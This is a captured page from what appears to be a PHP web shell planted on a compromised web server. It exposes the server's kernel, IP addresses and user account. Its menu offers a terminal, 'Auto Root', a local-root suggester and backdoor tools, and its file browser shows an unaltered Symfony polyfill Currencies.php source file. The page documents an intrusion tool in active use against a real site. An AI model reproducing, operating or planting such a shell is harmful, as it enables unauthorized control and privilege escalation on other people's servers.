Linux unitednationsplay.com 3.10.0-1160.45.1.el7.x86_64 #1 SMP Wed Oct 13 17:20:51 UTC 2021 x86_64
nginx/1.20.1
Server IP : 188.130.139.92 & Your IP : 3.16.214.124
Domains :
Cant Read [ /etc/named.conf ]
User : web
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
www /
wb /
vendor /
symfony /
polyfill-intl-icu /
Delete
Unzip
Name
Size
Permission
Date
Action
DateFormat
[ DIR ]
drwxrwxr-x
2022-05-24 11:49
Exception
[ DIR ]
drwxrwxr-x
2022-05-24 11:49
Resources
[ DIR ]
drwxrwxr-x
2022-05-24 11:49
Collator.php
7.26
KB
-rw-rw-r--
2022-05-24 11:49
Currencies.php
1.14
KB
-rw-rw-r--
2022-05-24 11:49
Icu.php
2.96
KB
-rw-rw-r--
2022-05-24 11:49
IntlDateFormatter.php
19.67
KB
-rw-rw-r--
2022-05-24 11:49
LICENSE
1.04
KB
-rw-rw-r--
2022-05-24 11:49
Locale.php
8.72
KB
-rw-rw-r--
2022-05-24 11:49
NumberFormatter.php
28.32
KB
-rw-rw-r--
2022-05-24 11:49
README.md
852
B
-rw-rw-r--
2022-05-24 11:49
bootstrap.php
906
B
-rw-rw-r--
2022-05-24 11:49
bootstrap80.php
826
B
-rw-rw-r--
2022-05-24 11:49
composer.json
1.14
KB
-rw-rw-r--
2022-05-24 11:49
Save
Rename
<?php /* * This file is part of the Symfony package. * * (c) Fabien Potencier <fabien@symfony.com> * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Symfony\Polyfill\Intl\Icu; /** * @author Nicolas Grekas <p@tchwork.com> * * @internal */ class Currencies { private static $data; public static function getSymbol(string $currency): ?string { $data = self::$data ?? self::$data = require __DIR__.'/Resources/currencies.php'; return $data[$currency][0] ?? $data[strtoupper($currency)][0] ?? null; } public static function getFractionDigits(string $currency): int { $data = self::$data ?? self::$data = require __DIR__.'/Resources/currencies.php'; return $data[$currency][1] ?? $data[strtoupper($currency)][1] ?? $data['DEFAULT'][1]; } public static function getRoundingIncrement(string $currency): int { $data = self::$data ?? self::$data = require __DIR__.'/Resources/currencies.php'; return $data[$currency][2] ?? $data[strtoupper($currency)][2] ?? $data['DEFAULT'][2]; } }